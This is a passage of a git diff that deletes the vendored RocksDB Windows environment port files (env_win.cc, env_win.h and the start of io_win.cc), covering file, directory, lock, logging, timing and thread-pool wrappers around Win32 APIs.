-Status WinEnvIO::FileExists(const std::string& fname) {
-  // F_OK == 0
-  const int F_OK_ = 0;
-  return _access(fname.c_str(), F_OK_) == 0 ? Status::OK()
-    : Status::NotFound();
-}
-
-Status WinEnvIO::GetChildren(const std::string& dir,
-  std::vector<std::string>* result) {
-
-  result->clear();
-  std::vector<std::string> output;
-
-  Status status;
-
-  auto CloseDir = [](DIR* p) { closedir(p); };
-  std::unique_ptr<DIR, decltype(CloseDir)> dirp(opendir(dir.c_str()),
-    CloseDir);
-
-  if (!dirp) {
-    switch (errno) {
-      case EACCES:
-      case ENOENT:
-      case ENOTDIR:
-        return Status::NotFound();
-      default:
-        return IOError(dir, errno);
-    }
-  } else {
-    if (result->capacity() > 0) {
-      output.reserve(result->capacity());
-    }
-
-    struct dirent* ent = readdir(dirp.get());
-    while (ent) {
-      output.push_back(ent->d_name);
-      ent = readdir(dirp.get());
-    }
-  }
-
-  output.swap(*result);
-
-  return status;
-}
-
-Status WinEnvIO::CreateDir(const std::string& name) {
-  Status result;
-
-  if (_mkdir(name.c_str()) != 0) {
-    auto code = errno;
-    result = IOError("Failed to create dir: " + name, code);
-  }
-
-  return result;
-}
-
-Status  WinEnvIO::CreateDirIfMissing(const std::string& name) {
-  Status result;
-
-  if (DirExists(name)) {
-    return result;
-  }
-
-  if (_mkdir(name.c_str()) != 0) {
-    if (errno == EEXIST) {
-      result =
-        Status::IOError("`" + name + "' exists but is not a directory");
-    } else {
-      auto code = errno;
-      result = IOError("Failed to create dir: " + name, code);
-    }
-  }
-
-  return result;
-}
-
-Status WinEnvIO::DeleteDir(const std::string& name) {
-  Status result;
-  if (_rmdir(name.c_str()) != 0) {
-    auto code = errno;
-    result = IOError("Failed to remove dir: " + name, code);
-  }
-  return result;
-}
-
-Status WinEnvIO::GetFileSize(const std::string& fname,
-  uint64_t* size) {
-  Status s;
-
-  WIN32_FILE_ATTRIBUTE_DATA attrs;
-  if (GetFileAttributesExA(fname.c_str(), GetFileExInfoStandard, &attrs)) {
-    ULARGE_INTEGER file_size;
-    file_size.HighPart = attrs.nFileSizeHigh;
-    file_size.LowPart = attrs.nFileSizeLow;
-    *size = file_size.QuadPart;
-  } else {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError("Can not get size for: " + fname, lastError);
-  }
-  return s;
-}
-
-uint64_t WinEnvIO::FileTimeToUnixTime(const FILETIME& ftTime) {
-  const uint64_t c_FileTimePerSecond = 10000000U;
-  // UNIX epoch starts on 1970-01-01T00:00:00Z
-  // Windows FILETIME starts on 1601-01-01T00:00:00Z
-  // Therefore, we need to subtract the below number of seconds from
-  // the seconds that we obtain from FILETIME with an obvious loss of
-  // precision
-  const uint64_t c_SecondBeforeUnixEpoch = 11644473600U;
-
-  ULARGE_INTEGER li;
-  li.HighPart = ftTime.dwHighDateTime;
-  li.LowPart = ftTime.dwLowDateTime;
-
-  uint64_t result =
-    (li.QuadPart / c_FileTimePerSecond) - c_SecondBeforeUnixEpoch;
-  return result;
-}
-
-Status WinEnvIO::GetFileModificationTime(const std::string& fname,
-  uint64_t* file_mtime) {
-  Status s;
-
-  WIN32_FILE_ATTRIBUTE_DATA attrs;
-  if (GetFileAttributesExA(fname.c_str(), GetFileExInfoStandard, &attrs)) {
-    *file_mtime = FileTimeToUnixTime(attrs.ftLastWriteTime);
-  } else {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError(
-      "Can not get file modification time for: " + fname, lastError);
-    *file_mtime = 0;
-  }
-
-  return s;
-}
-
-Status WinEnvIO::RenameFile(const std::string& src,
-  const std::string& target) {
-  Status result;
-
-  // rename() is not capable of replacing the existing file as on Linux
-  // so use OS API directly
-  if (!MoveFileExA(src.c_str(), target.c_str(), MOVEFILE_REPLACE_EXISTING)) {
-    DWORD lastError = GetLastError();
-
-    std::string text("Failed to rename: ");
-    text.append(src).append(" to: ").append(target);
-
-    result = IOErrorFromWindowsError(text, lastError);
-  }
-
-  return result;
-}
-
-Status WinEnvIO::LinkFile(const std::string& src,
-  const std::string& target) {
-  Status result;
-
-  if (!CreateHardLinkA(target.c_str(), src.c_str(), NULL)) {
-    DWORD lastError = GetLastError();
-
-    std::string text("Failed to link: ");
-    text.append(src).append(" to: ").append(target);
-
-    result = IOErrorFromWindowsError(text, lastError);
-  }
-
-  return result;
-}
-
-Status  WinEnvIO::LockFile(const std::string& lockFname,
-  FileLock** lock) {
-  assert(lock != nullptr);
-
-  *lock = NULL;
-  Status result;
-
-  // No-sharing, this is a LOCK file
-  const DWORD ExclusiveAccessON = 0;
-
-  // Obtain exclusive access to the LOCK file
-  // Previously, instead of NORMAL attr we set DELETE on close and that worked
-  // well except with fault_injection test that insists on deleting it.
-  HANDLE hFile = 0;
-  {
-    IOSTATS_TIMER_GUARD(open_nanos);
-    hFile = CreateFileA(lockFname.c_str(), (GENERIC_READ | GENERIC_WRITE),
-      ExclusiveAccessON, NULL, CREATE_ALWAYS,
-      FILE_ATTRIBUTE_NORMAL, NULL);
-  }
-
-  if (INVALID_HANDLE_VALUE == hFile) {
-    auto lastError = GetLastError();
-    result = IOErrorFromWindowsError(
-      "Failed to create lock file: " + lockFname, lastError);
-  } else {
-    *lock = new WinFileLock(hFile);
-  }
-
-  return result;
-}
-
-Status WinEnvIO::UnlockFile(FileLock* lock) {
-  Status result;
-
-  assert(lock != nullptr);
-
-  delete lock;
-
-  return result;
-}
-
-Status WinEnvIO::GetTestDirectory(std::string* result) {
-  std::string output;
-
-  const char* env = getenv("TEST_TMPDIR");
-  if (env && env[0] != '\0') {
-    output = env;
-    CreateDir(output);
-  } else {
-    env = getenv("TMP");
-
-    if (env && env[0] != '\0') {
-      output = env;
-    } else {
-      output = "c:\\tmp";
-    }
-
-    CreateDir(output);
-  }
-
-  output.append("\\testrocksdb-");
-  output.append(std::to_string(_getpid()));
-
-  CreateDir(output);
-
-  output.swap(*result);
-
-  return Status::OK();
-}
-
-Status WinEnvIO::NewLogger(const std::string& fname,
-  std::shared_ptr<Logger>* result) {
-  Status s;
-
-  result->reset();
-
-  HANDLE hFile = 0;
-  {
-    IOSTATS_TIMER_GUARD(open_nanos);
-    hFile = CreateFileA(
-      fname.c_str(), GENERIC_WRITE,
-      FILE_SHARE_READ | FILE_SHARE_DELETE,  // In RocksDb log files are
-      // renamed and deleted before
-      // they are closed. This enables
-      // doing so.
-      NULL,
-      CREATE_ALWAYS,  // Original fopen mode is "w"
-      FILE_ATTRIBUTE_NORMAL, NULL);
-  }
-
-  if (INVALID_HANDLE_VALUE == hFile) {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError("Failed to open LogFile" + fname, lastError);
-  } else {
-    {
-      // With log files we want to set the true creation time as of now
-      // because the system
-      // for some reason caches the attributes of the previous file that just
-      // been renamed from
-      // this name so auto_roll_logger_test fails
-      FILETIME ft;
-      GetSystemTimeAsFileTime(&ft);
-      // Set creation, last access and last write time to the same value
-      SetFileTime(hFile, &ft, &ft, &ft);
-    }
-    result->reset(new WinLogger(&WinEnvThreads::gettid, hosted_env_, hFile));
-  }
-  return s;
-}
-
-uint64_t WinEnvIO::NowMicros() {
-
-  if (GetSystemTimePreciseAsFileTime_ != NULL) {
-    // all std::chrono clocks on windows proved to return
-    // values that may repeat that is not good enough for some uses.
-    const int64_t c_UnixEpochStartTicks = 116444736000000000LL;
-    const int64_t c_FtToMicroSec = 10;
-
-    // This interface needs to return system time and not
-    // just any microseconds because it is often used as an argument
-    // to TimedWait() on condition variable
-    FILETIME ftSystemTime;
-    GetSystemTimePreciseAsFileTime_(&ftSystemTime);
-
-    LARGE_INTEGER li;
-    li.LowPart = ftSystemTime.dwLowDateTime;
-    li.HighPart = ftSystemTime.dwHighDateTime;
-    // Subtract unix epoch start
-    li.QuadPart -= c_UnixEpochStartTicks;
-    // Convert to microsecs
-    li.QuadPart /= c_FtToMicroSec;
-    return li.QuadPart;
-  }
-  using namespace std::chrono;
-  return duration_cast<microseconds>(system_clock::now().time_since_epoch()).count();
-}
-
-uint64_t WinEnvIO::NowNanos() {
-  // all std::chrono clocks on windows have the same resolution that is only
-  // good enough for microseconds but not nanoseconds
-  // On Windows 8 and Windows 2012 Server
-  // GetSystemTimePreciseAsFileTime(&current_time) can be used
-  LARGE_INTEGER li;
-  QueryPerformanceCounter(&li);
-  // Convert to nanoseconds first to avoid loss of precision
-  // and divide by frequency
-  li.QuadPart *= std::nano::den;
-  li.QuadPart /= perf_counter_frequency_;
-  return li.QuadPart;
-}
-
-Status WinEnvIO::GetHostName(char* name, uint64_t len) {
-  Status s;
-  DWORD nSize = static_cast<DWORD>(
-    std::min<uint64_t>(len, std::numeric_limits<DWORD>::max()));
-
-  if (!::GetComputerNameA(name, &nSize)) {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError("GetHostName", lastError);
-  } else {
-    name[nSize] = 0;
-  }
-
-  return s;
-}
-
-Status WinEnvIO::GetAbsolutePath(const std::string& db_path,
-  std::string* output_path) {
-  // Check if we already have an absolute path
-  // that starts with non dot and has a semicolon in it
-  if ((!db_path.empty() && (db_path[0] == '/' || db_path[0] == '\\')) ||
-    (db_path.size() > 2 && db_path[0] != '.' &&
-    ((db_path[1] == ':' && db_path[2] == '\\') ||
-    (db_path[1] == ':' && db_path[2] == '/')))) {
-    *output_path = db_path;
-    return Status::OK();
-  }
-
-  std::string result;
-  result.resize(_MAX_PATH);
-
-  char* ret = _getcwd(&result[0], _MAX_PATH);
-  if (ret == nullptr) {
-    return Status::IOError("Failed to get current working directory",
-      strerror(errno));
-  }
-
-  result.resize(strlen(result.data()));
-
-  result.swap(*output_path);
-  return Status::OK();
-}
-
-std::string WinEnvIO::TimeToString(uint64_t secondsSince1970) {
-  std::string result;
-
-  const time_t seconds = secondsSince1970;
-  const int maxsize = 64;
-
-  struct tm t;
-  errno_t ret = localtime_s(&t, &seconds);
-
-  if (ret) {
-    result = std::to_string(seconds);
-  } else {
-    result.resize(maxsize);
-    char* p = &result[0];
-
-    int len = snprintf(p, maxsize, "%04d/%02d/%02d-%02d:%02d:%02d ",
-      t.tm_year + 1900, t.tm_mon + 1, t.tm_mday, t.tm_hour,
-      t.tm_min, t.tm_sec);
-    assert(len > 0);
-
-    result.resize(len);
-  }
-
-  return result;
-}
-
-EnvOptions WinEnvIO::OptimizeForLogWrite(const EnvOptions& env_options,
-  const DBOptions& db_options) const {
-  EnvOptions optimized = env_options;
-  optimized.bytes_per_sync = db_options.wal_bytes_per_sync;
-  optimized.use_mmap_writes = false;
-  // This is because we flush only whole pages on unbuffered io and
-  // the last records are not guaranteed to be flushed.
-  optimized.use_direct_writes = false;
-  // TODO(icanadi) it's faster if fallocate_with_keep_size is false, but it
-  // breaks TransactionLogIteratorStallAtLastRecord unit test. Fix the unit
-  // test and make this false
-  optimized.fallocate_with_keep_size = true;
-  return optimized;
-}
-
-EnvOptions WinEnvIO::OptimizeForManifestWrite(
-  const EnvOptions& env_options) const {
-  EnvOptions optimized = env_options;
-  optimized.use_mmap_writes = false;
-  optimized.use_direct_writes = false;
-  optimized.fallocate_with_keep_size = true;
-  return optimized;
-}
-
-// Returns true iff the named directory exists and is a directory.
-bool WinEnvIO::DirExists(const std::string& dname) {
-  WIN32_FILE_ATTRIBUTE_DATA attrs;
-  if (GetFileAttributesExA(dname.c_str(), GetFileExInfoStandard, &attrs)) {
-    return 0 != (attrs.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY);
-  }
-  return false;
-}
-
-////////////////////////////////////////////////////////////////////////
-// WinEnvThreads
-
-WinEnvThreads::WinEnvThreads(Env* hosted_env) : hosted_env_(hosted_env), thread_pools_(Env::Priority::TOTAL) {
-
-  for (int pool_id = 0; pool_id < Env::Priority::TOTAL; ++pool_id) {
-    thread_pools_[pool_id].SetThreadPriority(
-      static_cast<Env::Priority>(pool_id));
-    // This allows later initializing the thread-local-env of each thread.
-    thread_pools_[pool_id].SetHostEnv(hosted_env);
-  }
-}
-
-WinEnvThreads::~WinEnvThreads() {
-
-  WaitForJoin();
-
-  for (auto& thpool : thread_pools_) {
-    thpool.JoinAllThreads();
-  }
-}
-
-void WinEnvThreads::Schedule(void(*function)(void*), void* arg, Env::Priority pri,
-  void* tag, void(*unschedFunction)(void* arg)) {
-  assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH);
-  thread_pools_[pri].Schedule(function, arg, tag, unschedFunction);
-}
-
-int WinEnvThreads::UnSchedule(void* arg, Env::Priority pri) {
-  return thread_pools_[pri].UnSchedule(arg);
-}
-
-namespace {
-
-  struct StartThreadState {
-    void(*user_function)(void*);
-    void* arg;
-  };
-
-  void* StartThreadWrapper(void* arg) {
-    std::unique_ptr<StartThreadState> state(
-      reinterpret_cast<StartThreadState*>(arg));
-    state->user_function(state->arg);
-    return nullptr;
-  }
-
-}
-
-void WinEnvThreads::StartThread(void(*function)(void* arg), void* arg) {
-  std::unique_ptr<StartThreadState> state(new StartThreadState);
-  state->user_function = function;
-  state->arg = arg;
-  try {
-
-    rocksdb::port::WindowsThread th(&StartThreadWrapper, state.get());
-    state.release();
-
-    std::lock_guard<std::mutex> lg(mu_);
-    threads_to_join_.push_back(std::move(th));
-
-  } catch (const std::system_error& ex) {
-    WinthreadCall("start thread", ex.code());
-  }
-}
-
-void WinEnvThreads::WaitForJoin() {
-  for (auto& th : threads_to_join_) {
-    th.join();
-  }
-  threads_to_join_.clear();
-}
-
-unsigned int WinEnvThreads::GetThreadPoolQueueLen(Env::Priority pri) const {
-  assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH);
-  return thread_pools_[pri].GetQueueLen();
-}
-
-uint64_t WinEnvThreads::gettid() {
-  uint64_t thread_id = GetCurrentThreadId();
-  return thread_id;
-}
-
-uint64_t WinEnvThreads::GetThreadID() const { return gettid(); }
-
-void  WinEnvThreads::SleepForMicroseconds(int micros) {
-  std::this_thread::sleep_for(std::chrono::microseconds(micros));
-}
-
-void WinEnvThreads::SetBackgroundThreads(int num, Env::Priority pri) {
-  assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH);
-  thread_pools_[pri].SetBackgroundThreads(num);
-}
-
-int WinEnvThreads::GetBackgroundThreads(Env::Priority pri) {
-  assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH);
-  return thread_pools_[pri].GetBackgroundThreads();
-}
-
-void WinEnvThreads::IncBackgroundThreadsIfNeeded(int num, Env::Priority pri) {
-  assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH);
-  thread_pools_[pri].IncBackgroundThreadsIfNeeded(num);
-}
-
-/////////////////////////////////////////////////////////////////////////
-// WinEnv
-
-WinEnv::WinEnv() : winenv_io_(this), winenv_threads_(this) {
-  // Protected member of the base class
-  thread_status_updater_ = CreateThreadStatusUpdater();
-}
-
-
-WinEnv::~WinEnv() {
-  // All threads must be joined before the deletion of
-  // thread_status_updater_.
-  delete thread_status_updater_;
-}
-
-Status WinEnv::GetThreadList(
-  std::vector<ThreadStatus>* thread_list) {
-  assert(thread_status_updater_);
-  return thread_status_updater_->GetThreadList(thread_list);
-}
-
-Status WinEnv::DeleteFile(const std::string& fname) {
-  return winenv_io_.DeleteFile(fname);
-}
-
-Status WinEnv::GetCurrentTime(int64_t* unix_time) {
-  return winenv_io_.GetCurrentTime(unix_time);
-}
-
-Status  WinEnv::NewSequentialFile(const std::string& fname,
-  std::unique_ptr<SequentialFile>* result,
-  const EnvOptions& options) {
-  return winenv_io_.NewSequentialFile(fname, result, options);
-}
-
-Status WinEnv::NewRandomAccessFile(const std::string& fname,
-  std::unique_ptr<RandomAccessFile>* result,
-  const EnvOptions& options) {
-  return winenv_io_.NewRandomAccessFile(fname, result, options);
-}
-
-Status WinEnv::NewWritableFile(const std::string& fname,
-                               std::unique_ptr<WritableFile>* result,
-                               const EnvOptions& options) {
-  return winenv_io_.OpenWritableFile(fname, result, options, false);
-}
-
-Status WinEnv::ReopenWritableFile(const std::string& fname,
-    std::unique_ptr<WritableFile>* result, const EnvOptions& options) {
-  return winenv_io_.OpenWritableFile(fname, result, options, true);
-}
-
-Status WinEnv::NewRandomRWFile(const std::string & fname,
-  unique_ptr<RandomRWFile>* result, const EnvOptions & options) {
-  return winenv_io_.NewRandomRWFile(fname, result, options);
-}
-
-Status WinEnv::NewDirectory(const std::string& name,
-  std::unique_ptr<Directory>* result) {
-  return winenv_io_.NewDirectory(name, result);
-}
-
-Status WinEnv::FileExists(const std::string& fname) {
-  return winenv_io_.FileExists(fname);
-}
-
-Status WinEnv::GetChildren(const std::string& dir,
-  std::vector<std::string>* result) {
-  return winenv_io_.GetChildren(dir, result);
-}
-
-Status WinEnv::CreateDir(const std::string& name) {
-  return winenv_io_.CreateDir(name);
-}
-
-Status WinEnv::CreateDirIfMissing(const std::string& name) {
-  return winenv_io_.CreateDirIfMissing(name);
-}
-
-Status WinEnv::DeleteDir(const std::string& name) {
-  return winenv_io_.DeleteDir(name);
-}
-
-Status WinEnv::GetFileSize(const std::string& fname,
-  uint64_t* size) {
-  return winenv_io_.GetFileSize(fname, size);
-}
-
-Status  WinEnv::GetFileModificationTime(const std::string& fname,
-  uint64_t* file_mtime) {
-  return winenv_io_.GetFileModificationTime(fname, file_mtime);
-}
-
-Status WinEnv::RenameFile(const std::string& src,
-  const std::string& target) {
-  return winenv_io_.RenameFile(src, target);
-}
-
-Status WinEnv::LinkFile(const std::string& src,
-  const std::string& target) {
-  return winenv_io_.LinkFile(src, target);
-}
-
-Status WinEnv::LockFile(const std::string& lockFname,
-  FileLock** lock) {
-  return winenv_io_.LockFile(lockFname, lock);
-}
-
-Status WinEnv::UnlockFile(FileLock* lock) {
-  return winenv_io_.UnlockFile(lock);
-}
-
-Status  WinEnv::GetTestDirectory(std::string* result) {
-  return winenv_io_.GetTestDirectory(result);
-}
-
-Status WinEnv::NewLogger(const std::string& fname,
-  std::shared_ptr<Logger>* result) {
-  return winenv_io_.NewLogger(fname, result);
-}
-
-uint64_t WinEnv::NowMicros() {
-  return winenv_io_.NowMicros();
-}
-
-uint64_t  WinEnv::NowNanos() {
-  return winenv_io_.NowNanos();
-}
-
-Status WinEnv::GetHostName(char* name, uint64_t len) {
-  return winenv_io_.GetHostName(name, len);
-}
-
-Status WinEnv::GetAbsolutePath(const std::string& db_path,
-  std::string* output_path) {
-  return winenv_io_.GetAbsolutePath(db_path, output_path);
-}
-
-std::string WinEnv::TimeToString(uint64_t secondsSince1970) {
-  return winenv_io_.TimeToString(secondsSince1970);
-}
-
-void  WinEnv::Schedule(void(*function)(void*), void* arg, Env::Priority pri,
-  void* tag,
-  void(*unschedFunction)(void* arg)) {
-  return winenv_threads_.Schedule(function, arg, pri, tag, unschedFunction);
-}
-
-int WinEnv::UnSchedule(void* arg, Env::Priority pri) {
-  return winenv_threads_.UnSchedule(arg, pri);
-}
-
-void WinEnv::StartThread(void(*function)(void* arg), void* arg) {
-  return winenv_threads_.StartThread(function, arg);
-}
-
-void WinEnv::WaitForJoin() {
-  return winenv_threads_.WaitForJoin();
-}
-
-unsigned int  WinEnv::GetThreadPoolQueueLen(Env::Priority pri) const {
-  return winenv_threads_.GetThreadPoolQueueLen(pri);
-}
-
-uint64_t WinEnv::GetThreadID() const {
-  return winenv_threads_.GetThreadID();
-}
-
-void WinEnv::SleepForMicroseconds(int micros) {
-  return winenv_threads_.SleepForMicroseconds(micros);
-}
-
-// Allow increasing the number of worker threads.
-void  WinEnv::SetBackgroundThreads(int num, Env::Priority pri) {
-  return winenv_threads_.SetBackgroundThreads(num, pri);
-}
-
-int WinEnv::GetBackgroundThreads(Env::Priority pri) {
-  return winenv_threads_.GetBackgroundThreads(pri);
-}
-
-void  WinEnv::IncBackgroundThreadsIfNeeded(int num, Env::Priority pri) {
-  return winenv_threads_.IncBackgroundThreadsIfNeeded(num, pri);
-}
-
-EnvOptions WinEnv::OptimizeForLogWrite(const EnvOptions& env_options,
-  const DBOptions& db_options) const {
-  return winenv_io_.OptimizeForLogWrite(env_options, db_options);
-}
-
-EnvOptions WinEnv::OptimizeForManifestWrite(
-  const EnvOptions& env_options) const {
-  return winenv_io_.OptimizeForManifestWrite(env_options);
-}
-
-}  // namespace port
-
-std::string Env::GenerateUniqueId() {
-  std::string result;
-
-  UUID uuid;
-  UuidCreateSequential(&uuid);
-
-  RPC_CSTR rpc_str;
-  auto status = UuidToStringA(&uuid, &rpc_str);
-  (void)status;
-  assert(status == RPC_S_OK);
-
-  result = reinterpret_cast<char*>(rpc_str);
-
-  status = RpcStringFreeA(&rpc_str);
-  assert(status == RPC_S_OK);
-
-  return result;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/win/env_win.h b/thirdparty/rocksdb/port/win/env_win.h
deleted file mode 100644
index ce1a61d..0000000
--- a/thirdparty/rocksdb/port/win/env_win.h
+++ /dev/null
@@ -1,310 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// An Env is an interface used by the rocksdb implementation to access
-// operating system functionality like the filesystem etc.  Callers
-// may wish to provide a custom Env object when opening a database to
-// get fine gain control; e.g., to rate limit file system operations.
-//
-// All Env implementations are safe for concurrent access from
-// multiple threads without any external synchronization.
-
-#pragma once
-
-#include "port/win/win_thread.h"
-#include <rocksdb/env.h>
-#include "util/threadpool_imp.h"
-
-#include <stdint.h>
-#include <windows.h>
-
-#include <mutex>
-#include <vector>
-#include <string>
-
-
-#undef GetCurrentTime
-#undef DeleteFile
-#undef GetTickCount
-
-namespace rocksdb {
-namespace port {
-
-// Currently not designed for inheritance but rather a replacement
-class WinEnvThreads {
-public:
-
-  explicit WinEnvThreads(Env* hosted_env);
-
-  ~WinEnvThreads();
-
-  WinEnvThreads(const WinEnvThreads&) = delete;
-  WinEnvThreads& operator=(const WinEnvThreads&) = delete;
-
-  void Schedule(void(*function)(void*), void* arg, Env::Priority pri,
-    void* tag,
-    void(*unschedFunction)(void* arg));
-
-  int UnSchedule(void* arg, Env::Priority pri);
-
-  void StartThread(void(*function)(void* arg), void* arg);
-
-  void WaitForJoin();
-
-  unsigned int GetThreadPoolQueueLen(Env::Priority pri) const;
-
-  static uint64_t gettid();
-
-  uint64_t GetThreadID() const;
-
-  void SleepForMicroseconds(int micros);
-
-  // Allow increasing the number of worker threads.
-  void SetBackgroundThreads(int num, Env::Priority pri);
-  int GetBackgroundThreads(Env::Priority pri);
-
-  void IncBackgroundThreadsIfNeeded(int num, Env::Priority pri);
-
-private:
-
-  Env*                     hosted_env_;
-  mutable std::mutex       mu_;
-  std::vector<ThreadPoolImpl> thread_pools_;
-  std::vector<WindowsThread> threads_to_join_;
-
-};
-
-// Designed for inheritance so can be re-used
-// but certain parts replaced
-class WinEnvIO {
-public:
-  explicit WinEnvIO(Env* hosted_env);
-
-  virtual ~WinEnvIO();
-
-  virtual Status DeleteFile(const std::string& fname);
-
-  virtual Status GetCurrentTime(int64_t* unix_time);
-
-  virtual Status NewSequentialFile(const std::string& fname,
-    std::unique_ptr<SequentialFile>* result,
-    const EnvOptions& options);
-
-  // Helper for NewWritable and ReopenWritableFile
-  virtual Status OpenWritableFile(const std::string& fname,
-    std::unique_ptr<WritableFile>* result,
-    const EnvOptions& options,
-    bool reopen);
-
-  virtual Status NewRandomAccessFile(const std::string& fname,
-    std::unique_ptr<RandomAccessFile>* result,
-    const EnvOptions& options);
-
-  // The returned file will only be accessed by one thread at a time.
-  virtual Status NewRandomRWFile(const std::string& fname,
-    unique_ptr<RandomRWFile>* result,
-    const EnvOptions& options);
-
-  virtual Status NewDirectory(const std::string& name,
-    std::unique_ptr<Directory>* result);
-
-  virtual Status FileExists(const std::string& fname);
-
-  virtual Status GetChildren(const std::string& dir,
-    std::vector<std::string>* result);
-
-  virtual Status CreateDir(const std::string& name);
-
-  virtual Status CreateDirIfMissing(const std::string& name);
-
-  virtual Status DeleteDir(const std::string& name);
-
-  virtual Status GetFileSize(const std::string& fname,
-    uint64_t* size);
-
-  static uint64_t FileTimeToUnixTime(const FILETIME& ftTime);
-
-  virtual Status GetFileModificationTime(const std::string& fname,
-    uint64_t* file_mtime);
-
-  virtual Status RenameFile(const std::string& src,
-    const std::string& target);
-
-  virtual Status LinkFile(const std::string& src,
-    const std::string& target);
-
-  virtual Status LockFile(const std::string& lockFname,
-    FileLock** lock);
-
-  virtual Status UnlockFile(FileLock* lock);
-
-  virtual Status GetTestDirectory(std::string* result);
-
-  virtual Status NewLogger(const std::string& fname,
-    std::shared_ptr<Logger>* result);
-
-  virtual uint64_t NowMicros();
-
-  virtual uint64_t NowNanos();
-
-  virtual Status GetHostName(char* name, uint64_t len);
-
-  virtual Status GetAbsolutePath(const std::string& db_path,
-    std::string* output_path);
-
-  virtual std::string TimeToString(uint64_t secondsSince1970);
-
-  virtual EnvOptions OptimizeForLogWrite(const EnvOptions& env_options,
-    const DBOptions& db_options) const;
-
-  virtual EnvOptions OptimizeForManifestWrite(
-    const EnvOptions& env_options) const;
-
-  size_t GetPageSize() const { return page_size_; }
-
-  size_t GetAllocationGranularity() const { return allocation_granularity_; }
-
-  uint64_t GetPerfCounterFrequency() const { return perf_counter_frequency_; }
-
-private:
-  // Returns true iff the named directory exists and is a directory.
-  virtual bool DirExists(const std::string& dname);
-
-  typedef VOID(WINAPI * FnGetSystemTimePreciseAsFileTime)(LPFILETIME);
-
-  Env*            hosted_env_;
-  size_t          page_size_;
-  size_t          allocation_granularity_;
-  uint64_t        perf_counter_frequency_;
-  FnGetSystemTimePreciseAsFileTime GetSystemTimePreciseAsFileTime_;
-};
-
-class WinEnv : public Env {
-public:
-  WinEnv();
-
-  ~WinEnv();
-
-  Status DeleteFile(const std::string& fname) override;
-
-  Status GetCurrentTime(int64_t* unix_time) override;
-
-  Status NewSequentialFile(const std::string& fname,
-    std::unique_ptr<SequentialFile>* result,
-    const EnvOptions& options) override;
-
-  Status NewRandomAccessFile(const std::string& fname,
-    std::unique_ptr<RandomAccessFile>* result,
-    const EnvOptions& options) override;
-
-  Status NewWritableFile(const std::string& fname,
-                         std::unique_ptr<WritableFile>* result,
-                         const EnvOptions& options) override;
-
-  // Create an object that writes to a new file with the specified
-  // name.  Deletes any existing file with the same name and creates a
-  // new file.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure stores nullptr in *result and
-  // returns non-OK.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  Status ReopenWritableFile(const std::string& fname,
-    std::unique_ptr<WritableFile>* result,
-    const EnvOptions& options) override;
-
-  // The returned file will only be accessed by one thread at a time.
-  Status NewRandomRWFile(const std::string& fname,
-    unique_ptr<RandomRWFile>* result,
-    const EnvOptions& options) override;
-
-  Status NewDirectory(const std::string& name,
-    std::unique_ptr<Directory>* result) override;
-
-  Status FileExists(const std::string& fname) override;
-
-  Status GetChildren(const std::string& dir,
-    std::vector<std::string>* result) override;
-
-  Status CreateDir(const std::string& name) override;
-
-  Status CreateDirIfMissing(const std::string& name) override;
-
-  Status DeleteDir(const std::string& name) override;
-
-  Status GetFileSize(const std::string& fname,
-    uint64_t* size) override;
-
-  Status GetFileModificationTime(const std::string& fname,
-    uint64_t* file_mtime) override;
-
-  Status RenameFile(const std::string& src,
-    const std::string& target) override;
-
-  Status LinkFile(const std::string& src,
-    const std::string& target) override;
-
-  Status LockFile(const std::string& lockFname,
-    FileLock** lock) override;
-
-  Status UnlockFile(FileLock* lock) override;
-
-  Status GetTestDirectory(std::string* result) override;
-
-  Status NewLogger(const std::string& fname,
-    std::shared_ptr<Logger>* result) override;
-
-  uint64_t NowMicros() override;
-
-  uint64_t NowNanos() override;
-
-  Status GetHostName(char* name, uint64_t len) override;
-
-  Status GetAbsolutePath(const std::string& db_path,
-    std::string* output_path) override;
-
-  std::string TimeToString(uint64_t secondsSince1970) override;
-
-  Status GetThreadList(
-    std::vector<ThreadStatus>* thread_list) override;
-
-  void Schedule(void(*function)(void*), void* arg, Env::Priority pri,
-    void* tag,
-    void(*unschedFunction)(void* arg)) override;
-
-  int UnSchedule(void* arg, Env::Priority pri) override;
-
-  void StartThread(void(*function)(void* arg), void* arg) override;
-
-  void WaitForJoin();
-
-  unsigned int GetThreadPoolQueueLen(Env::Priority pri) const override;
-
-  uint64_t GetThreadID() const override;
-
-  void SleepForMicroseconds(int micros) override;
-
-  // Allow increasing the number of worker threads.
-  void SetBackgroundThreads(int num, Env::Priority pri) override;
-  int GetBackgroundThreads(Env::Priority pri) override;
-
-  void IncBackgroundThreadsIfNeeded(int num, Env::Priority pri) override;
-
-  EnvOptions OptimizeForLogWrite(const EnvOptions& env_options,
-    const DBOptions& db_options) const override;
-
-  EnvOptions OptimizeForManifestWrite(
-    const EnvOptions& env_options) const override;
-
-private:
-
-  WinEnvIO      winenv_io_;
-  WinEnvThreads winenv_threads_;
-};
-
-} // namespace port
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/win/io_win.cc b/thirdparty/rocksdb/port/win/io_win.cc
deleted file mode 100644
index 3d2533a..0000000
--- a/thirdparty/rocksdb/port/win/io_win.cc
+++ /dev/null
@@ -1,1029 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
